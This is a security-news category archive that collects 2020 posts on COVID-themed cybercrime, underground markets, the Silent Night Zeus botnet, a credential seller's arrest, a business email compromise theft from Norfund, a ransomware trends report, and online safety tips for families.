Category Archives: Cybercrime

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

How to protect your business from COVID-19-themed vishing attacks

Cybercriminals have been using the COVID-19 pandemic as a central theme in all kinds of crisis-related email phishing campaigns. But because of the dramatic rise of the number of at-home workers, one method that has become increasingly common over the past few months are vishing attacks, i.e., phishing campaigns executed via phone calls. Rising success rates are the reason why vishing has become more common, and there are several factors driving this trend: People are … More

The post How to protect your business from COVID-19-themed vishing attacks appeared first on Help Net Security.

What’s trending on the underground market?

Trust has eroded among criminal interactions, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, Trend Micro reveals. Popular underground goods and services The report reveals that determined efforts by law enforcement appear to be having an impact on the cybercrime underground. Several forums have been taken down by global police entities, and remaining forums experience persistent DDoS attacks and log-in problems impacting their usefulness. Loss of trust led … More

The post What’s trending on the underground market? appeared first on Help Net Security.

How the Cybercriminal Underground Has Changed in 5 Years

Cybercriminal Underground

The cybercrime economy is one of the runaway success stories of the 21st century — at least, for those who participate in it. Estimates claim it could be worth over $1 trillion annually, more than the GDP of many countries. Part of that success is due to its ability to evolve and shift as the threat landscape changes. Trend Micro has been profiling the underground cybercrime community for many years. Over the past five years, we’ve seen a major shift to new platforms, communications channels, products and services, as trust on the dark web erodes and new market demands emerge.

We also expect the current pandemic to create yet another evolution, as cyber-criminals look to take advantage of new ways of working and systemic vulnerabilities.

Shifts in the underground

Our latest report, Shifts in the Cybercriminal Underground Markets, charts the fascinating progress of cybercrime over the past five years, through detailed analysis of forums, marketplaces and dark web sites around the world. It notes that in many product areas, the cost of items has dropped as they become commoditised: so where in 2015 you expected to pay $1000 per months for crypting services, today they may be as little as $20.

In other areas, such as IoT botnets, cyber-propaganda and stolen gaming account credentials, prices are high as new products spark surging demand. Fortnite logins can sell for around $1,000 on average, for example.

The good news is that law enforcement action appears to be working. Trend Micro has long partnered with Interpol, Europol, national crime agencies and local police to provide assistance in investigations. So it’s good to see that these efforts are having an impact. Many dark web forums and marketplaces have been infiltrated and taken down over the past five years, and our researchers note that current users complain of DDoS-ing and log-in issues.

Cybercriminals have been forced to take extreme measures as trust erodes among the community, for example, by using gaming communications service Discord to arrange trades, and e-commerce platform Shoppy.gg to sell items. A new site called DarkNet Trust was even created to tackle this specific challenge: it aims to verify cybercrime vendors’ reputations by analysing their usernames and PGP fingerprints.

What does the future hold?

However, things rarely stay still on the cybercrime underground. Going forward, we expect to see a range of new tools and techniques flood dark web stores and forums. AI will be at the centre of these efforts. Just as it’s being used by Trend Micro and other companies to root out fraud, sophisticated malware and phishing, it could be deployed in bots designed to predict roll patterns on gambling sites. It could also be used in deepfake services developed to help buyers bypass photo ID systems, or launch sextortion campaigns against individuals.

Some emerging trends are less hi-tech but no less damaging. Log-ins for wearable devices could be stolen and used to request replacements under warranty, defrauding the customer and costing the manufacturers dear. In fact, access to devices, systems and accounts is so common today that we’re already seeing it spun out in “as-a-service” cybercrime offerings. Prices for access to Fortune 500 companies can hit as much as $10,000.

Post-pandemic threats

Then there’s COVID-19. We’re already seeing fraudsters targeted government stimulus money with fake applications, sometimes using phished information from legitimate businesses. And healthcare organisations are being targeted with ransomware as they battle to save lives.

Even as the pandemic recedes, remote working practices are likely to stay in many organisations. What does this mean for cybercrime? It means more targeting of VPN vulnerabilities with malware and DDoS services. And it means more opportunities to compromise corporate networks via connected home devices. Think of it like a kind of Reverse BYOD scenario – instead of bringing devices into work to connect, the corporate network is now merged with home networks.

Tackling such challenges will demand a multi-layered strategy predicated around that familiar trio: people, process and technology. It will require more training, better security for home workers, improved patch management and password security, and much more besides. But most of all it will demand continued insight into global cybercriminals and the platforms they inhabit, to anticipate where the next threats are coming from.

Fortunately, this is where Trend Micro’s expert team of researchers come in. We won’t let them out of our sight.

The post How the Cybercriminal Underground Has Changed in 5 Years appeared first on .

Malware opens RDP backdoor into Windows systems

A new version of the Sarwent malware can open the Remote Desktop Protocol (RDP) port on target Windows computers to make sure that crooks can find their way back into the system through the backdoor. Whether that access is used later by the same crooks or sold to ransomware gangs or cyber espionage groups is unknown, but affected users should know that removing the malware does not close that particular “backdoor”. Sarwent’s new capabilities Sarwent … More

The post Malware opens RDP backdoor into Windows systems appeared first on Help Net Security.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night based on the Zeus banking Trojan that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaign. 

Silent Night

The source code of the Zeus Trojan is available in the cybercrime underground since 2011 allowing crooks to develop their own release since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx, it was first spotted in November 2019 when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe was advertising the Trojan as the result of over five years of work, a total of 15k ~ hours were spent for the development of the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build, $2,000 per month for a general build, while an extra for HVNC functionality is available for 1,000 USD/month and 14 days to test the code for 500 USD.

Experts believe that Axe is the developer of the Axe Bot 1.4.1, comparing Axe Bot 1.4.1 and Zloader 1.8.0 C2 source codes, experts noted that all of their custom PHP functions have the prefix CSR, which can either be a naming space or a developer’s handle

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, monitor keystrokes, take screenshots, harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, the decryption is performed only “on demand.” The analysis of the content of an open directory on the Command and Control server allowed the researchers to discover a manual for bot operators that includes instructions for the set up of the malware.

On Dec 23 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit, experts observed small campaigns, likely for testing purposes. The spreading intensified over time, in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

The dark web is flooded with offers to purchase corporate network access

There is a flood of interest in accessing corporate networks on the dark web, according to Positive Technologies. In Q1 2020, the number of postings advertising access to these networks increased by 69 percent compared to the previous quarter. This may pose a significant risk to corporate infrastructure, especially now that many employees are working remotely. “Access for sale” on the dark web is a generic term, referring to software, exploits, credentials, or anything else … More

The post The dark web is flooded with offers to purchase corporate network access appeared first on Help Net Security.

Beware of phishing emails urging for a LogMeIn security update

LogMeIn users are being targeted with fake security update requests, which lead to a spoofed phishing page. “Should recipients fall victim to this attack, their login credentials to their LogMeIn account would be compromised. Additionally, since LogMeIn has SSO with Lastpass as LogMeIn is the parent company, it is possible the attacker may be attempting to obtain access to this user’s password manager,” Abnormal Security noted. The fake LogMeIn security update request The phishing email … More

The post Beware of phishing emails urging for a LogMeIn security update appeared first on Help Net Security.

Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials

The Ukrainian Secret Service (SSU) has arrested a hacker known as Sanix, who was selling billions of stolen credentials on hacking forums and Telegram channels.

The popular hacker Sanix has been arrested by the Ukrainian Secret Service (SSU). The man is known in the cybercrime underground for selling billions of stolen credentials. The officials did not disclose the man of the cybercriminals, they only said that the man has been arrested in Ivano-Frankivsk, Ukraine.

“The Security Service of Ukraine has identified and detained a hacker known as Sanix. Early last year, it caught the attention of global cybersecurity experts by posting on one of the forums the sale of a database with 773 million e-mail addresses and 21 million unique passwords.” reads a press release published by the SSU.

“SBU cyber specialists recorded the sale of databases with logins and passwords to e-mail boxes, PIN codes for bank cards, e-wallets of cryptocurrencies, PayPal accounts, information about computers hacked for further use in botnets and for organizing DDoS attacks”

The man was known for aggregating data, including users’ credentials, in lists that were offered for sale via Telegram (where he used the nickname Sanixer) or in hacking forums.

Sanix was identified by the investigator Brian Krebs as the source of Collection 1 in January 2019. Some of the most popular collections sold in the past by the same hacker are known as Collection #1, #2, #3, #4, #5, Antipublic, and others.

Collection #1

Sanix has been active on the cybercrime underground at least since 2018, he focuses in the sale of stolen data from organizations.

It has been estimated that the man amassed billions of unique username-password combinations.

Stolen credentials were bought by fraudsters, hackers, and scammers to carry out a broad range of malicious activities, such as launching malspam campaign or take over users’ accounts.

During searches at his residence, SSU officers seized computer equipment containing two terabytes of stolen information, phones with evidence of illegal activities and cash from illegal transactions in the amount of almost 190,000 Ukrainian hryvnias (roughly $7,000) and more than $3000.

Pierluigi Paganini

(SecurityAffairs – Sanix, hacking)

The post Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials appeared first on Security Affairs.

EasyJet reveals cyber-attack exposed 9m customers’ details

Airline apologises after credit card details of about 2,200 passengers were stolen

EasyJet has revealed that the personal information of 9 million customers was accessed in a “highly sophisticated” cyber-attack on the airline.

The company on Tuesday disclosed that email addresses and travel details were accessed and said it will contact all of the customers affected.

Continue reading...

Money is still the root of most breaches

Verizon has released its annual Data Breach Investigations Report (DBIR), which offers an overview of the cyber security incidents and data breaches that happened in/were discovered in the past year. Based on an analysis of incident and breach reports by 81 contributing organizations – companies, CERTs, law enforcement agencies and cybercrime units, etc. – from around the world, the DBIR offers insight into current cyber attack trends and the threats organizations in various industry verticals … More

The post Money is still the root of most breaches appeared first on Help Net Security.

New software enables existing sensors to detect ransomware

Engineers from SMU’s Darwin Deason Institute for Cybersecurity have developed software to detect ransomware attacks before attackers can inflict catastrophic damage. Ransomware is crippling cities and businesses all over the world, and the number of ransomware attacks have increased since the start of the coronavirus pandemic. Attackers are also threatening to publicly release sensitive data if ransom isn’t paid. The FBI estimates that ransomware victims have paid hackers more than $140 million in the last … More

The post New software enables existing sensors to detect ransomware appeared first on Help Net Security.

COVID-19 online fraud trends: Industries, schemes and targets

The telecommunications, retail and financial services industries have been increasingly impacted by COVID-19 online fraud, according to TransUnion. From a consumer perspective, Millennials have been most targeted by fraudsters using COVID-19 scams. Overall, the percent of suspected fraudulent digital transactions rose 5% from March 11 to April 28 when compared to Jan. 1 to March 10, 2020. More than 100 million risky transactions from March 11 to April 28 have been identified. “Given the billions … More

The post COVID-19 online fraud trends: Industries, schemes and targets appeared first on Help Net Security.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack, hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once identified the employee that responsible for money transfers. the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through the bank Norfund.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay of its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30 when the fraudsters attempted to carry out a new fraud, that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

Teaming up with INTERPOL to combat COVID-19 threats

If the past couple of months have taught us anything, it’s that partnerships matter in times of crisis. We’re better, stronger and more resilient when we work together. Specifically, public-private partnerships matter in cybersecurity, which is why Trend Micro is always happy to reach out across industry, academia and law enforcement to offer its expertise.

We are again delighted to be working with long-time partner INTERPOL over the coming weeks on a new awareness campaign to help businesses and remote workers stay safe from a deluge of COVID-19 threats.

The new normal

All over the world, organizations have been forced to rapidly adjust to the new normal: social distancing, government lockdowns and mass remote working. While most have responded superbly to the challenge, there’s no denying that IT security teams and remote access infrastructure are being stretched to the limit. There are understandable concerns that home workers may be more distracted, and therefore likely to click on phishing links, and that their PCs and devices may not be as well protected as corporate equivalents.

At the same time, the bad guys have also reacted quickly to take advantage of the pandemic. Phishing campaigns using COVID as a lure have surged, spoofing health authorities, government departments and corporate senders. BEC attacks try to leverage the fact that home workers may not have colleagues around to check wire transfer requests. And remote infrastructure like RDP endpoints and VPNs are being targeted by ransomware attackers — even healthcare organizations that are simultaneously trying to treat critical patients infected with the virus.

Getting the basics right

That’s why Trend Micro has been pushing out regular updates — not only on the latest scams and threats we’re picking up around the globe, but also with advice on how to secure the newly distributed workforce. Things like improved password security, 2FA for work accounts, automatic software updates, regular back-ups, remote user training, and restricted use of VPNs can all help. We’re also offering six months free use of our flagship Trend Micro Maximum Security product to home workers.

Yet there’s always more to do. Getting the message across as far and wide as possible is where organizations like INTERPOL come in. That’s why we’re delighted to be teaming up with the global policing organization to run a new public awareness campaign throughout May. It builds on highly successful previous recent campaigns we’ve collaborated on, to tackle BEC and crypto-jacking.

This time, we’ll be resharing some key resources on social media to alert users to the range of threats out there, and what businesses and home workers can do to stay safe. And we’ll help to develop infographics and other new messages on how to combat ransomware, online scams, phishing and other threats.

We’re all doing what we can during these difficult days. But if some good can come from a truly terrible event like this, then it’s that we show our strength in the face of adversity. And by following best practices, we can make life much tougher for the cybercriminals looking to profit from tragedy.

The post Teaming up with INTERPOL to combat COVID-19 threats appeared first on .

Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone

virtual play date

Every day we discover (or stumble over) new ways of coping and connecting during this unique chapter in family life. Still, as every age group under your roof finds their favorite virtual play date and hangout apps, parents may need to add a few safety rails to make sure the fun stays fun.

IRL community resurfaces

virtual play date

While this health crisis is devastating in so many ways, it’s also put a spotlight on the many heartwarming ways to connect in real life (IRL). We’re placing teddy bears in our windows for solidarity, creating scavenger hunts for neighborhood kids, serenading shut-ins, publically supporting first responders, celebrating birthdays and graduations with drive-by parades, and so, so much more.

The ongoing infusion of true, human connection has softened the uncertainty. Still, kids of every age need to maintain an emotional connection with peers. Here are a few things to think about as kids of every age connect with friends online.

Pre-K and Elementary Virtual Play Dates

Since health experts have put restrictions on familiar fun for little ones such as playgrounds, sports leagues, sleepovers, playdates, and even visits with grandparents, parents are relaxing screen time rules and looking for ways to have virtual playdates. Free video tools such as FaceTime and Zoom are proving lifesavers for group art, play, and learning, as are safe websites for young ones and phone apps. (If you run out things to do, here’s a great list of fun to tap and great learning sites for every age group).

Keep Them Safe

  • Share online experiences with young children at all times. Sit with them to teach, monitor, and explain the context of new digital environments. Also, keep computers and phones in a common area.
  • Try to keep screen time brief. Even young kids can become too screen-reliant.
  • Maximize privacy settings on all devices and turn on and safe mode or search on websites and apps.
  • Introduce concepts such as cyberbullying and strangers in age-appropriate language.
  • Start family security efforts early. Consider the benefits of filtering software, safe browsing, and encrypting your family’s digital activity with a Virtual Private Network (VPN).

Middle and High Schooler Virtual Hang Outs

While screen time has spiked, digital connection while homebound is also essential for tweens and teens for both learning and peer relationships. Kids finding their new virtual hangouts on social networks, group chats, and video games. They are also playing virtual board games using sites such as Pogo, Let’s Play Uno, and Zoom. Netflix Party has become a fun way to watch Netflix with groups of friends.

Keep Them Safe

  • At this age many kids (own or will soon own) a smartphone. With increased time online, you may want to review the basics, such as privacy and location settings. This includes gaming devices.
  • With increased internet use and most schools closed for the year, using parental control software and gaming security software can help parents reduce online risks for children of all ages.
  • Be aware of and talk about trending, risky digital behaviors, and challenges that can surface on apps such as TikTok, and WhatsApp.
  • Review and approve games and apps before they are downloaded and consider monitoring your children’s devices as well as social profiles and posts.
  • This age group is quick to jump on public wifi, which puts your family’s data at risk. Exploring using a family VPN is critical for this age group.
  • Discuss the danger of connecting with strangers online. Also, discuss the risks of oversharing personal information and photos, even in seemingly private chats and texts. Don’t let boredom lead to bad choices.
  • Discuss cyberbullying and how to block and report accounts that express hateful, racist, or threatening behavior.
  • Coach your kids on using strong passwords and how to verify legitimate websites and identity online scams.

There’s nothing normal for families about this time, but there is something special. Grab it. Keep talking and laughing, especially on the hard days. Have a daily “heart check-in” with your teen if he or she seems to be isolating. Give one another space for topsy turvy moods. And, don’t forget parents, before this is all over, be sure to nail that TikTok dance with your kids and share it with the world!

The post Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone appeared first on McAfee Blogs.

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attacks panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

Zero-Day Malware

Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

Immagine che contiene dispositivo

Descrizione generata automaticamente

A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

Immagine che contiene dispositivo

Descrizione generata automaticamente

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Internet Safety for Kids: A Refresher for Homebound Families

internet safety for kids

Editor’s Note: This is part II of our internet safety for kids series. Part I focuses on younger children and can be read here.

Parents have always been concerned about keeping their kids safe online — especially their tweens and teens. That conversation is even more critical with parents and kids now working and learning at home. But as the days turn into weeks, the line between safe and risky digital behavior may get a little blurry. Maybe we can help by refreshing some basics.

Why is internet safety for kids important?

There’s no way around it. Young and old, over time, we’ve tethered nearly every aspect of our lives to the digital realm. If we want to work, bank, shop, pay bills, or connect with family and friends, we have to plugin. A wired life makes internet safety not just important, but mission-critical for parents.

Kids go online for school, to be entertained, and to connect with friends; only they don’t have the emotional maturity or critical thinking skills to process everything they will encounter on the other side of their screens.

That’s where proactive digital parenting comes in.

If our parenting goal is to raise wise, responsible, caring adults, equipped for real life, that goal must also include helping them safeguard their emotional and physical health from online risk. There’s no such thing as a digital platform or product that is 100% safe. So, our best strategy is to learn and pass on skills that mitigate that risk.

What are the dangers of the internet?

Any danger that exists offline is potentially multiplied when we log online due to the vast access the web affords each one of us. In a few clicks, we can unlock a world of possibilities. The flip side? There’s an ever-present battalion of crooks and bullies out to exploit that access. Online we will encounter the best and the worst of humankind. The daily threats to children include bullying, inappropriate content, predators, and the loss of privacy. Add to that list, digital viruses and malware, phishing scams, sharing regrettable content, and gaming addiction.

How can homebound kids avoid digital risk?

So what can we do to ensure the weeks ahead don’t bring more digital risk into our homes? We start by having consistent, candid conversations with our kids about online safety (even if eye-rolling begins). Truth: Your family’s cybersecurity is as strong as the weakest security link in your family. If one family member is lax about internet safety, your entire family’s security is compromised.

So let’s get started with some internet safety basics to share with your tweens and teens. To read internet safety guidelines for younger children, click here.

11 Internet Safety Basics for Homebound Teens

internet safety for kids

  1. Get candid about content. Your tweens and teens have likely come across inappropriate material online. You can minimize further exposure by discussing expectations and family values around acceptable content — both sharing it and receiving it. Reminder: “Vanishing” Snapchats and deleted content can be easily captured in a screenshot — nothing shared online is private. For extra monitoring muscle, consider adding a parental control software to your family’s internet safety plan.
  2. Keep passwords, software, apps updated. Being homebound gives us all extra time for details. Go through personal and family devices and update all passwords. Keeping device software and apps updated also protects kids from outside risk.
  3. Balance life and tech. Kids can lose their entire day surfing, scrolling, and watching YouTube or TikTok videos. Establish screen limits help kids grow healthy tech habits. Consider scheduling device breaks, no phone zones (dinner table, movie time, bedtime), and installing software that features time limits.
  4. Be a leader online. Yoda was on target — with much power comes much responsibility. Many online dangers can be diminished by consistently teaching kids to be upstanders online. Practicing empathy, respect, tolerance, and compassion makes the digital world safer for everyone.
  5. Address peer pressure. Kids with devices can share unwise, personal photos with friends they trust. When friendships end, however, those photos can be shared or used for bullying or extortion. Discuss digital peer pressure with your child and how to respond.
  6. Look out for scams. Talk frequently about the many forms scams can take, such as phishing, malware, catfishing, fake news, and clickbait.
  7. Don’t friend strangers. Sexual predators create fake social media accounts specifically to befriend kids. In turn, kids share personal info, daily plans, location, and may even agree to meet in person with online friends. Discuss these risky scenarios and other manipulation tactics of predators with your child. Be aware of his or her friend circles, and look for chat apps such as WhatsApp or Kik.
  8. Maximize privacy on social profiles. Help kids maximize privacy settings on social profiles and delete any profile or post information that unintentionally gives away personal data. Consider removing the names of family members, pets, school, hometown, and birthdays. Hackers can piece together this information to crack passwords or create authentic-looking phishing scams.
  9. Consider a family VPN. Virtual Private Networks are becoming the most popular way to conduct business, shop, and safeguard a family’s online activity from outsiders. VPN encryption can protect a child against several virtual threats.
  10. Review gaming safety. If your kids spend a lot of time on games like Fortnite and Call of Duty, they can encounter strangers, bullying, and scams that target gamers. Teen gamers should use a firewall to help block would-be attackers from gaining access to their PC and home networks and as well as a comprehensive security solution to protect devices from malware and other threats.
  11. Monitor devices. Consider spot-checking all devices routinely. Review privacy settings on social networks (kids change them), look for new apps, review browsing history, chats, and texts. Need to go a step farther? Keep your child’s phone for a few hours to check notifications that pop up. You may find activity that wasn’t necessarily visible otherwise.

